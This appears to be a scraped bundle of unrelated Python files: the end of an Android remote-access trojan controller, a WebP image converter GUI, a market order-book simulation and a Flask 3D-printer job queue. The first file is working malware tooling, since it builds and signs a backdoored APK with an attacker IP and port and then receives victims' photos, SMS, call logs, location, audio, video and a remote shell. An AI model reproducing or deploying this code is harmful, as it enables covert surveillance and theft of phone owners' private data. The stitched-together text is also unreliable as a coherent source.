getClipData --> return the current saved text from the clipboard
getMACAddress --> returns the mac address of the device
exit --> exit the interpreter
"""
print(helper)
def getImage(client):
print(stdOutput("info")+"\033[0mTaking Image")
timestr = time.strftime("%Y%m%d-%H%M%S")
flag=0
filename ="Dumps"+direc+"Image_"+timestr+'.jpg'
imageBuffer=recvall(client)
imageBuffer = imageBuffer.strip().replace("END123","").strip()
if imageBuffer=="":
print(stdOutput("error")+"Unable to connect to the Camera\n")
return
with open(filename,'wb') as img:
try:
imgdata = base64.b64decode(imageBuffer)
img.write(imgdata)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\n")
except binascii.Error as e:
flag=1
print(stdOutput("error")+"Not able to decode the Image\n")
if flag == 1:
os.remove(filename)
def readSMS(client,data):
print(stdOutput("info")+"\033[0mGetting "+data+" SMS")
msg = "start"
timestr = time.strftime("%Y%m%d-%H%M%S")
filename = "Dumps"+direc+data+"_"+timestr+'.txt'
flag =0
with open(filename, 'w',errors="ignore", encoding="utf-8") as txt:
msg = recvall(client)
try:
txt.write(msg)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\n")
except UnicodeDecodeError:
flag = 1
print(stdOutput("error")+"Unable to decode the SMS\n")
if flag == 1:
os.remove(filename)
def getFile(filename,ext,data):
fileData = "Dumps"+direc+filename+"."+ext
flag=0
with open(fileData, 'wb') as file:
try:
rawFile = base64.b64decode(data)
file.write(rawFile)
print(stdOutput("success")+"Succesfully Downloaded in \033[1m\033[32m"+getpwd(fileData)+"\n")
except binascii.Error:
flag=1
print(stdOutput("error")+"Not able to decode the Audio File")
if flag == 1:
os.remove(filename)
def putFile(filename):
data = open(filename, "rb").read()
encoded = base64.b64encode(data)
return encoded
def shell(client):
msg = "start"
command = "ad"
while True:
msg = recvallShell(client)
if "getFile" in msg:
msg=" "
msg1 = recvall(client)
msg1 = msg1.replace("\nEND123\n","")
filedata = msg1.split("|_|")
getFile(filedata[0],filedata[1],filedata[2])
if "putFile" in msg:
msg=" "
sendingData=""
filename = command.split(" ")[1].strip()
file = pathlib.Path(filename)
if file.exists():
encoded_data = putFile(filename).decode("UTF-8")
filedata = filename.split(".")
sendingData+="putFile"+"<"+filedata[0]+"<"+filedata[1]+"<"+encoded_data+"END123\n"
client.send(sendingData.encode("UTF-8"))
print(stdOutput("success")+f"Succesfully Uploaded the file \033[32m{filedata[0]+'.'+filedata[1]} in /sdcard/temp/")
else:
print(stdOutput("error")+"File not exist")
if "Exiting" in msg:
print("\033[1m\033[33m----------Exiting Shell----------\n")
return
msg = msg.split("\n")
for i in msg[:-2]:
print(i)
print(" ")
command = input("\033[1m\033[36mandroid@shell:~$\033[0m \033[1m")
command = command+"\n"
if command.strip() == "clear":
client.send("test\n".encode("UTF-8"))
clear()
else:
client.send(command.encode("UTF-8"))
def getLocation(sock):
msg = "start"
while True:
msg = recvall(sock)
msg = msg.split("\n")
for i in msg[:-2]:
print(i)
if("END123" in msg):
return
print(" ")
def recvall(sock):
buff=""
data = ""
while "END123" not in data:
data = sock.recv(4096).decode("UTF-8","ignore")
buff+=data
return buff
def recvallShell(sock):
buff=""
data = ""
ready = select.select([sock], [], [], 3)
while "END123" not in data:
if ready[0]:
data = sock.recv(4096).decode("UTF-8","ignore")
buff+=data
else:
buff="bogus"
return buff
return buff
def stopAudio(client):
print(stdOutput("info")+"\033[0mDownloading Audio")
timestr = time.strftime("%Y%m%d-%H%M%S")
data= ""
flag =0
data=recvall(client)
data = data.strip().replace("END123","").strip()
filename = "Dumps"+direc+"Audio_"+timestr+".mp4"
with open(filename, 'wb') as audio:
try:
audioData = base64.b64decode(data)
audio.write(audioData)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename))
except binascii.Error:
flag=1
print(stdOutput("error")+"Not able to decode the Audio File")
print(" ")
if flag == 1:
os.remove(filename)
def stopVideo(client):
print(stdOutput("info")+"\033[0mDownloading Video")
timestr = time.strftime("%Y%m%d-%H%M%S")
data= ""
flag=0
data=recvall(client)
data = data.strip().replace("END123","").strip()
filename = "Dumps"+direc+"Video_"+timestr+'.mp4'
with open(filename, 'wb') as video:
try:
videoData = base64.b64decode(data)
video.write(videoData)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename))
except binascii.Error:
flag = 1
print(stdOutput("error")+"Not able to decode the Video File\n")
if flag == 1:
os.remove("Video_"+timestr+'.mp4')
def callLogs(client):
print(stdOutput("info")+"\033[0mGetting Call Logs")
msg = "start"
timestr = time.strftime("%Y%m%d-%H%M%S")
msg = recvall(client)
filename = "Dumps"+direc+"Call_Logs_"+timestr+'.txt'
if "No call logs" in msg:
msg.split("\n")
print(msg.replace("END123","").strip())
print(" ")
else:
with open(filename, 'w',errors="ignore", encoding="utf-8") as txt:
txt.write(msg)
txt.close()
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\033[0m")
if not os.path.getsize(filename):
os.remove(filename)
def get_shell(ip,port):
soc = socket.socket()
soc = socket.socket(type=socket.SOCK_STREAM)
try:
soc.bind((ip, int(port)))
except Exception as e:
print(stdOutput("error")+"\033[1m %s"%e);exit()
soc.listen(2)
print(banner)
while True:
que = queue.Queue()
t = threading.Thread(target=connection_checker,args=[soc,que])
t.daemon = True
t.start()
while t.isAlive(): animate("Waiting for Connections ")
t.join()
conn, addr = que.get()
clear()
print("\033[1m\033[33mGot connection from \033[31m"+"".join(str(addr))+"\033[0m")
print(" ")
while True:
msg = conn.recv(4024).decode("UTF-8")
if(msg.strip() == "IMAGE"):
getImage(conn)
elif("readSMS" in msg.strip()):
content = msg.strip().split(" ")
data = content[1]
readSMS(conn,data)
elif(msg.strip() == "SHELL"):
shell(conn)
elif(msg.strip() == "getLocation"):
getLocation(conn)
elif(msg.strip() == "stopVideo123"):
stopVideo(conn)
elif(msg.strip() == "stopAudio"):
stopAudio(conn)
elif(msg.strip() == "callLogs"):
callLogs(conn)
elif(msg.strip() == "help"):
help()
else:
print(stdOutput("error")+msg) if "Unknown Command" in msg else print("\033[1m"+msg) if "Hello there" in msg else print(msg)
message_to_send = input("\033[1m\033[36mInterpreter:/> \033[0m")+"\n"
conn.send(message_to_send.encode("UTF-8"))
if message_to_send.strip() == "exit":
print(" ")
print("\033[1m\033[32m\t (∗ ・‿・)ノ゛\033[0m")
sys.exit()
if(message_to_send.strip() == "clear"):clear()
def connection_checker(socket,queue):
conn, addr = socket.accept()
queue.put([conn,addr])
return conn,addr
def build(ip,port,output,ngrok=False,ng=None,icon=None):
editor = "Compiled_apk"+direc+"smali"+direc+"com"+direc+"example"+direc+"reverseshell2"+direc+"config.smali"
try:
file = open(editor,"r").readlines()
#Very much uncertaninity but cant think any other way to do it xD
file[18]=file[18][:21]+"\""+ip+"\""+"\n"
file[23]=file[23][:21]+"\""+port+"\""+"\n"
file[28]=file[28][:15]+" 0x0"+"\n" if icon else file[28][:15]+" 0x1"+"\n"
str_file="".join([str(elem) for elem in file])
open(editor,"w").write(str_file)
except Exception as e:
print(e)
sys.exit()
java_version = execute("java -version")
version_no = re.search(pattern, java_version.stderr).groups()[0]
if java_version.stderr == "":print(stdOutput("error")+"Java Not Installed");exit()
if float(version_no) < 1.8: print(stdOutput("error")+"Java 8 is required ");exit()
print(stdOutput("info")+"\033[0mGenerating APK")
outFileName = output if output else "karma.apk"
que = queue.Queue()
t = threading.Thread(target=executeCMD,args=["java -jar Jar_utils/apktool.jar b Compiled_apk -o "+outFileName,que],)
t.start()
while t.isAlive(): animate("Building APK ")
t.join()
print(" ")
resOut = que.get()
if not resOut.returncode:
print(stdOutput("success")+"Successfully apk built in \033[1m\033[32m"+getpwd(outFileName)+"\033[0m")
print(stdOutput("info")+"\033[0mSigning the apk")
t = threading.Thread(target=executeCMD,args=["java -jar Jar_utils/sign.jar "+outFileName+" --override",que],)
t.start()
while t.isAlive(): animate("Signing Apk ")
t.join()
print(" ")
resOut = que.get()
if not resOut.returncode:
print(stdOutput("success")+"Successfully signed the apk \033[1m\033[32m"+outFileName+"\033[0m")
if ngrok:
clear()
get_shell("0.0.0.0",8000) if not ng else get_shell("0.0.0.0",ng)
print(" ")
else:
print("\r"+resOut.stderr)
print(stdOutput("error")+"Signing Failed")
else:
print("\r"+resOut.stderr)
print(stdOutput("error")+"Building Failed")
|
main.py
|
# WEB P CONVERTER BY BIG SECRET. PLEASE DO NOT REDISTRIBUTE OR SELL.
# This software may not be resold, redistributed or otherwise conveyed to a third party
import traceback
import threading
import os
import sys
from PIL import Image, UnidentifiedImageError
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
class convertToWebP(QMainWindow):
def __init__(self, *args, **kwargs):
super(convertToWebP, self).__init__(*args, **kwargs)
self.version = 1.3
self.inputPath = ""
self.usingFolder = False
self.fileCount = 0
self.imagesConvertedCount = 0
self.losslessStatus = False
self.exportQuality = 80
self.exportMethod = 4
self.saveToInputDirectory = False
self.outputPath = ""
self.filesToConvert = []
self.fileCount = 0
self.inputDirectory = ""
self.outputFolderSet = False
# UI
self.setWindowTitle(f"WebP Converter by Big Secret | v{self.version}")
self.setWindowIcon(QIcon('appIcon-01.ico'))
self.setMinimumSize(500, 350)
self.setFont(QFont("Arial", 10))
# LAYOUTS
self.mainLayout = QVBoxLayout()
self.headerLayout = QHBoxLayout()
self.topBarLayout = QHBoxLayout()
self.settingsFrame = QFrame()
self.settingsLayout = QVBoxLayout()
self.settingsLayout.setAlignment(Qt.AlignHCenter)
self.settingsFrame.setFrameShape(QFrame.StyledPanel)
self.settingsFrame.setLineWidth(5)
self.settingsFrame.setLayout(self.settingsLayout)
self.statusBarLayout = QHBoxLayout()
# WIDGETS
# TOP BAR
self.locateFilesLabel = QLabel()
self.locateFilesLabel.setText("Locate File(s):")
self.buyMeCoffee = QLabel()
self.buyMeCoffee.setText("<a href='https://www.paypal.com/donate/?hosted_button_id=KMU4WDWUUVK4C'>Buy me a coffee</a>")
self.buyMeCoffee.setFont(QFont("Arial", 8))
self.buyMeCoffee.setTextFormat(Qt.RichText)
self.buyMeCoffee.setTextInteractionFlags(Qt.TextBrowserInteraction)
self.buyMeCoffee.setOpenExternalLinks(True)
self.headerLayout.addWidget(self.locateFilesLabel)
self.headerLayout.addStretch()
self.headerLayout.addWidget(self.buyMeCoffee)
self.selectFileButton = QPushButton()
self.selectFileButton.setText("Select File(s)")
self.selectFileButton.clicked.connect(self.selectFile)
self.selectFolderButton = QPushButton()
self.selectFolderButton.setText("Select Folder")
self.selectFolderButton.clicked.connect(self.selectFolder)
self.resetAllButton = QPushButton()
self.resetAllButton.setText("Reset All")
self.resetAllButton.clicked.connect(self.initializeSettings)
# PLACE INTO LAYOUT
self.topBarLayout.addWidget(self.selectFileButton)
self.topBarLayout.addWidget(self.selectFolderButton)
self.topBarLayout.addStretch()
self.topBarLayout.addWidget(self.resetAllButton)
# SETTINGS BAR
self.settingsLabel = QLabel()
self.settingsLabel.setText("Convert to WebP Settings")
self.settingsLabel.setFont(QFont("Arial", 13))
self.losslessCheckbox = QCheckBox()
self.losslessCheckbox.setText("Lossless Format")
self.losslessCheckbox.stateChanged.connect(self.updateLosslessCheckbox)
# QUALITY
self.qualityDefault = 80
self.qualityNameLabel = QLabel()
self.qualityNameLabel.setText("Quality: ")
self.qualityNumberLabel = QLineEdit()
self.qualityNumberLabel.setFixedWidth(25)
self.qualityNumberLabel.setText(f"{self.qualityDefault}")
self.qualityNumberLabel.textChanged.connect(self.updateQualityEntry)
self.qualitySlider = QSlider()
self.qualitySlider.setValue(self.qualityDefault)
self.qualitySlider.setOrientation(Qt.Horizontal)
self.qualitySlider.setMaximum(100)
self.qualitySlider.setMinimum(1)
self.qualitySlider.setSizeIncrement(1, 0)
self.qualitySlider.valueChanged.connect(self.updateQualitySlider)
self.qualityDescriptionLabel = QLabel()
self.qualityDescriptionLabel.setText(
"1-100, Defaults to 80.\nFor lossy, 0 gives the smallest size and 100 the largest. For lossless, this parameter is the amount of effort put into the compression: 0 is the fastest, but gives larger files compared to the slowest, but best, 100.")
self.qualityDescriptionLabel.setFont(QFont("Arial", 8))
self.qualityDescriptionLabel.setWordWrap(True)
# Create H Layout for these Quality Widgets
self.qualityLayout = QHBoxLayout()
self.qualityLayout.addWidget(self.qualityNameLabel)
self.qualityLayout.addWidget(self.qualityNumberLabel)
self.qualityLayout.addWidget(self.qualitySlider)
# WEB P CONVERTER BY BIG SECRET. PLEASE DO NOT REDISTRIBUTE OR SELL.
# This software may not be resold, redistributed or otherwise conveyed to a third party
# METHOD
self.methodDefault = 4
self.methodLabel = QLabel()
self.methodLabel.setText("Method: ")
self.methodNumberLabel = QLineEdit()
self.methodNumberLabel.setText(str(self.methodDefault))
self.methodNumberLabel.setFixedWidth(25)
self.methodNumberLabel.textChanged.connect(self.updateMethodEntry)
self.methodSlider = QSlider()
self.methodSlider.setOrientation(Qt.Horizontal)
self.methodSlider.setMinimum(0)
self.methodSlider.setMaximum(6)
self.methodSlider.setValue(self.methodDefault)
self.methodSlider.valueChanged.connect(self.updateMethodSlider)
self.methodDescriptionLabel = QLabel()
self.methodDescriptionLabel.setText("Quality vs Speed Tradeoff. Defaults to 4.\n0 = Fast, 6 = Slower, Better.")
self.methodDescriptionLabel.setFont(QFont("Arial", 8))
self.methodDescriptionLabel.setWordWrap(True)
self.saveCurrentSettingsCheckbox = QCheckBox()
self.saveCurrentSettingsCheckbox.setText("Save Settings (coming soon)")
self.saveCurrentSettingsCheckbox.setDisabled(True)
# CREATE H LAYOUT FOR METHOD WIDGETS
self.methodLayout = QHBoxLayout()
self.methodLayout.addWidget(self.methodLabel)
self.methodLayout.addWidget(self.methodNumberLabel)
self.methodLayout.addWidget(self.methodSlider)
# OUTPUT
self.sameAsInputCheckbox = QCheckBox()
self.sameAsInputCheckbox.setText("Save to Input Directory")
self.sameAsInputCheckbox.setCheckState(True)
self.sameAsInputCheckbox.setDisabled(True)
self.sameAsInputCheckbox.stateChanged.connect(self.updateOutputCheckbox)
self.setOutFolderButton = QPushButton()
self.setOutFolderButton.setText("Select Output Folder")
self.setOutFolderButton.setFixedWidth(140)
self.setOutFolderButton.setDisabled(True)
self.setOutFolderButton.clicked.connect(self.selectOutputFolder)
# PLACE INTO LAYOUT
self.settingsLayout.addWidget(self.settingsLabel)
self.settingsLayout.addWidget(self.losslessCheckbox)
self.settingsLayout.addLayout(self.qualityLayout)
self.settingsLayout.addWidget(self.qualityDescriptionLabel)
self.settingsLayout.addLayout(self.methodLayout)
self.settingsLayout.addWidget(self.methodDescriptionLabel)
self.settingsLayout.addWidget(self.saveCurrentSettingsCheckbox)
self.settingsLayout.addStretch()
# STATUS BAR
self.statusBarText = QLabel()
self.statusBarText.setText("State: Ready")
self.statusBarText.setWordWrap(True)
self.statusBarText.setFont(QFont('Arial',8))
self.statusBarText.setFixedWidth(round(self.width()*.75))
self.convertImagesButton = QPushButton()
self.convertImagesButton.setText("Convert to WebP ▶")
self.convertImagesButton.setDisabled(True)
self.convertImagesButton.clicked.connect(self.createConvertThread)
# PLACE INTO LAYOUT
self.statusBarLayout.addWidget(self.statusBarText)
self.statusBarLayout.addStretch()
self.statusBarLayout.addWidget(self.convertImagesButton)
# ORDER LAYOUTS
self.mainLayout.addLayout(self.headerLayout)
self.mainLayout.addLayout(self.topBarLayout)
self.mainLayout.addWidget(self.settingsFrame)
self.mainLayout.addWidget(self.sameAsInputCheckbox)
self.mainLayout.addWidget(self.setOutFolderButton)
self.mainLayout.addLayout(self.statusBarLayout)
# WEB P CONVERTER BY BIG SECRET. PLEASE DO NOT REDISTRIBUTE OR SELL.
# This software may not be resold, redistributed or otherwise conveyed to a third party
# FINALIZE UI
self.mainWidget = QWidget()
self.mainWidget.setLayout(self.mainLayout)
self.setCentralWidget(self.mainWidget)
self.show()
self.setFixedSize(self.width(), self.height())
# INITIALIZE SETTINGS
def initializeSettings(self):
self.inputPath = ""
self.usingFolder = False
self.fileCount = 0
self.imagesConvertedCount = 0
self.losslessStatus = False
self.exportQuality = 80
self.exportMethod = 4
self.saveToInputDirectory = False
self.outputPath = ""
self.filesToConvert = []
self.fileCount = 0
self.inputDirectory = ""
self.outputFolderSet = False
self.qualityNumberLabel.setText(str(self.qualityDefault))
self.methodNumberLabel.setText(str(self.methodDefault))
self.losslessCheckbox.setCheckState(0)
self.saveCurrentSettingsCheckbox.setCheckState(0)
self.sameAsInputCheckbox.setCheckState(0)
self.convertImagesButton.setDisabled(True)
self.setOutFolderButton.setDisabled(True)
self.sameAsInputCheckbox.setDisabled(True)
self.setStatusText("Everything Reset!")
def setStatusText(self, text):
self.statusBarText.setText(f"Status: {text}")
print(f"Status: {text}")
# VALUE SLIDER SETTINGS FOR QUALITY
def updateQualitySlider(self, value):
self.qualityNumberLabel.setText(str(value))
self.exportQuality = int(value)
def updateQualityEntry(self, value):
if value == "":
return
elif len(value) > 0:
if int(value) > 100:
value = 100
elif int(value) == 0:
value = self.qualityDefault
else:
value = int(value)
self.qualityNumberLabel.setText(str(value))
self.qualitySlider.setValue(value)
self.exportQuality = int(value)
else:
self.qualitySlider.setValue(self.qualityDefault)
# VALUE SLIDER SETTINGS FOR METHOD
def updateMethodEntry(self, value):
if value == "":
return
elif int(value) > 6:
self.methodNumberLabel.setText(str(6))
value = 6
else:
value = int(value)
self.methodSlider.setValue(value)
self.exportMethod = int(value)
def updateMethodSlider(self, value):
self.methodNumberLabel.setText(str(value))
self.exportMethod = int(value)
# WEB P CONVERTER BY BIG SECRET. PLEASE DO NOT REDISTRIBUTE OR SELL.
# This software may not be resold, redistributed or otherwise conveyed to a third party
# EXPORT CHECKBOX SETTINGS
def updateLosslessCheckbox(self,value):
if value == 2:
self.losslessStatus = True
elif value == 0:
self.losslessStatus = False
def updateOutputCheckbox(self, value):
if value > 0:
self.setOutFolderButton.setDisabled(True)
self.saveToInputDirectory = True
elif value == 0:
self.setOutFolderButton.setDisabled(False)
self.saveToInputDirectory = False
def selectFile(self):
self.inputPath, check = QFileDialog.getOpenFileNames(None, "Select an Image File", "C:\\", "All Files (*)")
if len(self.inputPath) > 0:
inputDirectory = self.inputPath[0].split("/")
inputDirectory.pop(-1)
for i in inputDirectory:
if self.inputDirectory == "":
self.inputDirectory = i
else:
self.inputDirectory = f"{self.inputDirectory}/{i}"
if check:
for x in self.inputPath:
self.fileCount += 1
self.filesToConvert.append(x)
self.setStatusText(f"Added {x}")
self.setStatusText(f"{self.fileCount} files loaded from {self.inputDirectory}.")
self.inputPath = self.inputDirectory
self.outputPath = self.inputPath
self.convertImagesButton.setDisabled(False)
self.setOutFolderButton.setDisabled(False)
self.sameAsInputCheckbox.setDisabled(False)
def selectFolder(self):
self.inputPath = QFileDialog.getExistingDirectory(None, "Select a Folder", "C:\\")
self.outputPath = self.inputPath
if self.inputPath:
for file in os.listdir(self.inputPath):
if "." in file:
self.filesToConvert.append(f"{self.inputPath}/{file}")
self.fileCount = len(self.filesToConvert)
self.setStatusText(f"{self.fileCount} files loaded from {self.inputPath}.")
self.convertImagesButton.setDisabled(False)
self.setOutFolderButton.setDisabled(False)
self.sameAsInputCheckbox.setDisabled(False)
def selectOutputFolder(self):
self.outputPath = QFileDialog.getExistingDirectory(None, "Select a Folder", self.inputPath)
if len(self.outputPath) > 0:
if self.inputDirectory == self.outputPath:
self.sameAsInputCheckbox.setCheckState(True)
self.setStatusText(f"{self.outputPath} same as input directory.")
else:
self.setStatusText(f"{self.outputPath} set as output directory.")
self.sameAsInputCheckbox.setCheckState(False)
self.outputFolderSet = True
def convertWebP(self):
self.setDisabled(True)
self.statusBarText.setDisabled(False)
self.buyMeCoffee.setDisabled(False)
for file in self.filesToConvert:
self.convertThisImage(file)
self.initializeSettings()
self.setStatusText("Conversion Complete")
self.setDisabled(False)
def createConvertThread(self):
print(f"STARTING CONVERSION PROCESS WITH THE FOLLOWING SETTINGS:\n"
f"Lossless: {self.losslessStatus}\n"
f"Export Quality: {self.exportQuality}\n"
f"Export Method: {self.exportMethod}\n")
self.convertImagesButton.setDisabled(True)
self.x = threading.Thread(target=self.convertWebP)
self.x.start()
def convertThisImage(self, imagePath):
self.setStatusText(f"Converting {imagePath}")
try:
image = Image.open(imagePath)
image = image.convert("RGBA")
if self.saveToInputDirectory:
outputDirectory = self.inputPath
else:
outputDirectory = self.outputPath
filename = imagePath.split("/")[-1]
filename = filename.split(".")[0] + ".webp"
finalPath = f"{outputDirectory}/{filename}"
imgInfo = image.info
image.save(finalPath, format='webp', lossless=self.losslessStatus, quality=self.exportQuality,
method=self.exportMethod, **imgInfo)
self.imagesConvertedCount += 1
self.setStatusText(f"{self.imagesConvertedCount}/{self.fileCount} converted & saved as {finalPath}")
except UnidentifiedImageError:
self.setStatusText(f"!!!!! ERROR: {imagePath} not supported !!!!!")
if __name__ == "__main__":
app = QApplication(sys.argv)
window = convertToWebP()
window.show()
# monitorQueue()
app.exec_()
traceback.print_exc()
# WEB P CONVERTER BY BIG SECRET. PLEASE DO NOT REDISTRIBUTE OR SELL.
# This software may not be resold, redistributed or otherwise conveyed to a third party
|
simulation.py
|
import threading
import numpy as np
from src.side import (
Side
)
from src.event_generator import (
EventTypes,
EventGenerator,
event_generation_loop
)
def run_market_data_simulation(config, state):
# Create threads that create the market events
threads = []
# Create buy limit order add sampling threads
n_levels = 15
thread_id = 1
instrument = "0"
for level in range(1, n_levels + 1):
generator = EventGenerator(thread_id, instrument, EventTypes.ADD, Side.B, level, 1.10 * np.exp(-0.08*(level - 1)), 1)
kwargs = {'state': state, 'generator': generator}
state.add_simulation_thread(threading.Thread(target=event_generation_loop, kwargs=kwargs))
thread_id += 1
# Create sell limit order add sampling threads
for level in range(1, n_levels + 1):
generator = EventGenerator(thread_id, instrument, EventTypes.ADD, Side.S, level, 1.10 * np.exp(-0.08*(level - 1)), 1)
kwargs = {'state': state, 'generator': generator}
state.add_simulation_thread(threading.Thread(target=event_generation_loop, kwargs=kwargs))
thread_id += 1
# Create buy limit order cancel sampling threads
for level in range(1, n_levels + 1):
generator = EventGenerator(thread_id, instrument, EventTypes.CANCEL, Side.B, level, 1.0 * np.exp(-0.10*(level - 1)), 1)
kwargs = {'state': state, 'generator': generator}
state.add_simulation_thread(threading.Thread(target=event_generation_loop, kwargs=kwargs))
thread_id += 1
# Create sell limit order cancel sampling threads
for level in range(1, n_levels + 1):
generator = EventGenerator(thread_id, instrument, EventTypes.CANCEL, Side.S, level, 1.0 * np.exp(-0.10*(level - 1)), 1)
kwargs = {'state': state, 'generator': generator}
state.add_simulation_thread(threading.Thread(target=event_generation_loop, kwargs=kwargs))
thread_id += 1
# Create a buy market order sampling thread
generator = EventGenerator(thread_id, instrument, EventTypes.MARKET_ORDER, Side.B, None, 0.5, None)
kwargs = {'state': state, 'generator': generator}
state.add_simulation_thread(threading.Thread(target=event_generation_loop, kwargs=kwargs))
thread_id += 1
# Create a sell market order sampling thread
generator = EventGenerator(thread_id, instrument, EventTypes.MARKET_ORDER, Side.S, None, 0.5, None)
kwargs = {'state': state, 'generator': generator}
state.add_simulation_thread(threading.Thread(target=event_generation_loop, kwargs=kwargs))
thread_id += 1
# Start the threads
for thread in state.get_simulation_threads():
thread.start()
|
app.py
|
# Imports for client
import os
from flask import Flask, render_template, redirect, url_for, request, flash
from flask_bootstrap import Bootstrap
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms import StringField, PasswordField, BooleanField, SelectField
from wtforms.validators import InputRequired, Email, Length
from flask_sqlalchemy import SQLAlchemy
from werkzeug.security import generate_password_hash, check_password_hash
from werkzeug.utils import secure_filename
from flask_login import LoginManager, UserMixin, login_user, login_required, logout_user, current_user
from flask_admin import Admin, BaseView, expose
from flask_admin.contrib.sqla import ModelView
from emailValidator import checkUobEmail
from orchestrators import Orchestrator
from printers import Printer
from jobs import Job
from queue import Queue
waiting_q = Queue(maxsize=0)
printing_q = Queue(maxsize=0)
import threading
app = Flask(__name__)
# App config for login and DB
app.config['SECRET_KEY'] = 'helloworld'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///./database.db'
# Config for upload
UPLOAD_FOLDER = './static/uploads'
ALLOWED_EXTENSIONS = set(['g', 'gcode'])
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
# Initialise bootstrap and DB
Bootstrap(app)
db = SQLAlchemy(app)
# Config login manager
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'
printers = [
# Printer('Ultimaker 2+ (1)', '192.168.0.201', 'B5A36115A3DC49148EFC52012E7EBCD9',
# 'Hackspace', 'duplicator', 'PLA', 'red'),
# Printer('Ultimaker 2+ (2)', '192.168.0.202', 'ED7F718BBE11456BA3619A04C66EF74A',
# 'Hackspace', 'Ultimaker 2+', 'PLA', 'red')
]
orchestrator = Orchestrator(printers)
# Printer('Ultimaker 2+ (1)', '192.168.0.201', 'B5A36115A3DC49148EFC52012E7EBCD9',
# 'Hackspace', 'duplicator', 'PLA', 'red'),
# Printer('Ultimaker 2+ (2)', '192.168.0.202', 'ED7F718BBE11456BA3619A04C66EF74A',
# 'Hackspace', 'Ultimaker 2+', 'PLA', 'red')
worker_thread = threading.Thread(target=orchestrator.run, args=(waiting_q, printing_q, ))
worker_thread.start()
# ADMIN
admin = admin = Admin(app)
# DB ENTRIES
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(15), unique=True)
email = db.Column(db.String(50), unique=True)
faculty = db.Column(db.String(80))
password = db.Column(db.String(80))
class Printers(BaseView):
@expose('/')
def printers(self):
return self.render('/admin/printers.html', printer_list=make_printer_advanced_info())
class jobQueue(BaseView):
@expose('/')
def jobqueue(self):
return self.render('/admin/jobQueue.html', job_list=make_jobs_list())
# class IFrame(BaseView):
# @expose('/iframe/')
# def index(self):
# return self.render('admin/iframe.html', printers)
admin.add_view(ModelView(User, db.session))
admin.add_view(Printers(name='Printers', endpoint='printers'))
admin.add_view(jobQueue(name='Job Queue', endpoint='jobQueue'))
# FORM ENTRIES
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class loginForm(FlaskForm):
username = StringField('username', validators=[InputRequired(), Length(min=4, max=15)])
password = PasswordField('password', validators=[InputRequired(), Length(min=8, max=80)])
remember = BooleanField('remember me')
valid_emails = ["my.bristol.ac.uk", "bristol.ac.uk"]
class registerForm(FlaskForm):
username = StringField('username', validators=[InputRequired(), Length(min=4, max=15)])
email = StringField('email', validators=[InputRequired(), Email(
message='Invalid email'), Length(max=50), checkUobEmail()])
faculty = StringField('faculty', validators=[InputRequired(), Length(max=80)])
password = PasswordField('password', validators=[InputRequired(), Length(min=8, max=80)])
class uploadForm(FlaskForm):
colour = SelectField('Filament colour', choices=[('r', 'Red'), ('b', 'Black'), ('g', 'Grey')])
material = SelectField('Filament material', choices=[(
'pla', 'PLA'), ('abs', 'ABS'), ('ninja', 'NinjaFlex')])
gcode = FileField('gcode file', validators=[
FileRequired()])
def make_printer_info():
printer_info = []
for printer in printers:
printer_info.append([printer.name, printer.location, printer.simple_status()])
return printer_info
def make_printer_advanced_info():
global printers
printer_info = []
for printer in printers:
printer_info.append([printer.name, printer.location, printer.simple_status(), printer.url])
return printer_info
# APP ROUTES
@app.route('/')
def index():
return render_template('index.html', printer_list=make_printer_info())
@app.route('/testupload', methods=['GET', 'POST'])
def testUpload():
form = uploadForm()
if form.validate_on_submit():
colour = form.colour.data
material = form.material.data
gcode = form.gcode.data
filename = secure_filename(gcode.filename)
gcode.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return "working"
return render_template('testUpload.html', form=form)
@app.route('/login', methods=['GET', 'POST'])
def login():
form = loginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user:
if check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
return redirect(url_for('dashboard'))
flash('Invalid username or password')
return render_template('login.html', form=form)
return render_template('login.html', form=form)
@app.route('/signup', methods=['GET', 'POST'])
def signup():
form = registerForm()
if form.validate_on_submit():
hashed_password = generate_password_hash(form.password.data, method='sha256')
new_user = User(username=form.username.data,
email=form.email.data, faculty=form.faculty.data, password=hashed_password)
db.session.add(new_user)
db.session.commit()
flash('New user created')
return render_template('signup.html', form=form)
return render_template('signup.html', form=form)
def make_jobs_list():
unformatted_jobs = list(printing_q.queue) + list(waiting_q.queue) # TODO: Is this right?
job_list = []
for job in unformatted_jobs:
if job.time_remaining is not 'Pending':
new_time = str(int(job.time_remaining.split(' ')[0]) - 1) + " mins"
job.time_remaining = new_time
printer = job.printing_on
if (printer == None):
stream_url = '#'
else:
stream_url = printer.url + '/webcam/?action=stream'
job_list.append([job.filename.split('/')[-1], job.user.username,
job.location, job.time_remaining, stream_url])
return job_list
@app.route('/dashboard')
@login_required
def dashboard():
return render_template('dashboard/dashboard.html', name=current_user.username, job_list=make_jobs_list())
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/upload', methods=['GET', 'POST'])
@login_required
def upload_file():
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
flash("No file part")
return render_template('dashboard/upload.html')
user_file = request.files['file']
# if user does not select file, browser also
# submit a empty part without filename
if user_file.filename == '':
flash("No file extension")
return render_template('dashboard/upload.html')
if not allowed_file(user_file.filename):
flash("Invalid file extension")
return render_template('dashboard/upload.html')
if user_file and allowed_file(user_file.filename):
filename = secure_filename(user_file.filename)
path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
user_file.save(path)
new_job = Job(path, 'black', 'PLA', current_user)
waiting_q.put(new_job)
flash("File uploaded succesfully")
